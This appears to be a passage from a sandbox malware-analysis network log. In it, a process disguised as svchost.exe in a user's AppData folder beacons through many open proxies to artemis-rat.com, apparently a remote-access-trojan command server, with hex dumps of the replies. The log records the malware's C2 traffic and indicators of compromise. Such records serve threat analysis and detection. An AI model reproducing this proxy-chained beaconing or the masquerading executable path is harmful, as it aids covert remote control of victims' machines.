Mar 9, 2024 13:14:32.946604967 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2978	192.168.2.5	57270	195.248.243.149	7237	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.785219908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.645728111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.645942926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.646136999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2979	192.168.2.5	59614	218.252.244.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.785315990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2980	192.168.2.5	59761	185.162.229.70	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.789104939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.944251060 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2981	192.168.2.5	59604	18.228.198.164	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.789166927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.115971088 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:32 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:33.148246050 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a7 04 d0 d9 c7 b9 1e 5a b5 06 3b d6 a3 85 b3 84 49 38 46 ad 7d 65 b9 38 16 95 4e f2 20 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRZ;I8F}e8N *,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:33.974044085 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a7 04 d0 d9 c7 b9 1e 5a b5 06 3b d6 a3 85 b3 84 49 38 46 ad 7d 65 b9 38 16 95 4e f2 20 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRZ;I8F}e8N *,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:33.975414038 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:32 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:34.304022074 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 81 72 ab 4f 1c 75 48 6f da 24 c5 29 11 da e5 54 c0 df 57 81 5c b4 4e 39 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9rOuHo$)TW\N9DOWNGRD0000H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0H0Z~fVz'
Mar 9, 2024 13:14:34.333460093 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 b8 c5 7c fd 27 24 74 68 74 44 83 06 65 e0 43 11 f8 d3 70 e8 64 7a 5f 1d b6 b3 48 e5 1d b5 81 7b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 11 33 5e 99 af 61 1e af 43 f3 2f 48 a7 38 a7 c9 03 d9 5b 1d 2a Data Ascii: %! \|'$thtDeCpdz_H{(3^aC/H8[*Z!B0`P
Mar 9, 2024 13:14:34.658130884 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 5c 96 41 03 71 d5 e3 ec 6c 08 bb 8f 5e 6a 9d 79 40 37 b0 d6 99 0a 87 a8 08 2e 2f 3b 3e 1a b8 93 06 12 a3 cd 4f 23 54 58 Data Ascii: (\Aql^jy@7./;>O#TX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2982	192.168.2.5	59036	142.44.210.174	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.789166927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.802232027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2983	192.168.2.5	59783	104.18.20.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.790462017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.944706917 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2984	192.168.2.5	59570	202.150.1.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.794612885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2985	192.168.2.5	58900	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.794619083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2986	192.168.2.5	59576	202.162.219.10	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.804819107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2987	192.168.2.5	59611	103.166.141.74	20074	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.805967093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2988	192.168.2.5	59577	103.231.78.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.811484098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2989	192.168.2.5	59563	13.234.24.116	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.817332983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677234888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.077541113 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:33 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2990	192.168.2.5	59143	104.18.136.28	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.817339897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.333595037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.494658947 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2991	192.168.2.5	59573	139.129.202.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.818913937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.208355904 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:33.208405018 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2992	192.168.2.5	57237	202.61.204.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.831636906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646012068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2993	192.168.2.5	59721	104.20.125.124	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.832019091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.986347914 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2994	192.168.2.5	59640	46.35.9.110	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.836410999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2995	192.168.2.5	58923	103.146.137.5	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.841568947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2996	192.168.2.5	59655	51.15.247.93	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.858264923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2997	192.168.2.5	59654	23.137.248.197	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.860901117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2998	192.168.2.5	59054	45.188.164.48	1994	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.861478090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.062798977 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2999	192.168.2.5	59635	122.51.123.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.861479044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3000	192.168.2.5	58997	82.223.121.72	4985	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.865335941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.973870993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3001	192.168.2.5	59659	121.164.200.18	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.867228985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3002	192.168.2.5	59498	175.183.82.221	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:32.873043060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3003	192.168.2.5	59637	91.202.230.219	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
